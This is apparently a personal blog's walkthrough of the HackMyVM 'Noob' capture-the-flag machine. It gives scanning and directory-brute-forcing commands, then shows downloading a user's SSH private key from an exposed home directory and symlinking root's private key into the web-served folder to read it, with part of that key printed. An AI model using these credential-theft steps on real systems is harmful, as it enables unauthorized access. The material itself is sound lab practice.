Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Noob Walkthrough

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan dirs. Because too many fake response, we omit file extensions.

 ~ gobuster dir -u http://192.168.56.100:65530 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt   -b 401,403,404,500 --wildcard   -o 65530.log
 ...
 ===============================================================
 /index                (Status: 200) [Size: 19]
 /http%3A%2F%2Fwww     (Status: 301) [Size: 45] [--> /http:/www]
 /http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
 /http%3A%2F%2Fblogs   (Status: 301) [Size: 47] [--> /http:/blogs]
 /http%3A%2F%2Fblog    (Status: 301) [Size: 46] [--> /http:/blog]
 /**http%3A%2F%2Fwww   (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
 /http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
 /http%3A%2F%2Fradar   (Status: 301) [Size: 47] [--> /http:/radar]
 /http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
 /http%3A%2F%2Fweblog  (Status: 301) [Size: 48] [--> /http:/weblog]
 /http%3A%2F%2Fswik    (Status: 301) [Size: 46] [--> /http:/swik]
 /nt4share             (Status: 301) [Size: 45] [--> /nt4share/]
 ===============================================================

Notice the last /nt4sare. Check it.

 ~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get an user name "adela".

 ~ curl http://192.168.56.100:65530/nt4share/.bash_history
 ...
 ls -la /opt
 find / -user adela 2>/dev/null
 ...

From /.ssh, we download id_rsa, and login ssh as user adela.

 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
 gdev),109(netdev)

The last step is tricky. Enum a lot but still can not find the way to root.

Create a symbolic link to /root/.ssh/id_rsa, then read it through http.

 adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0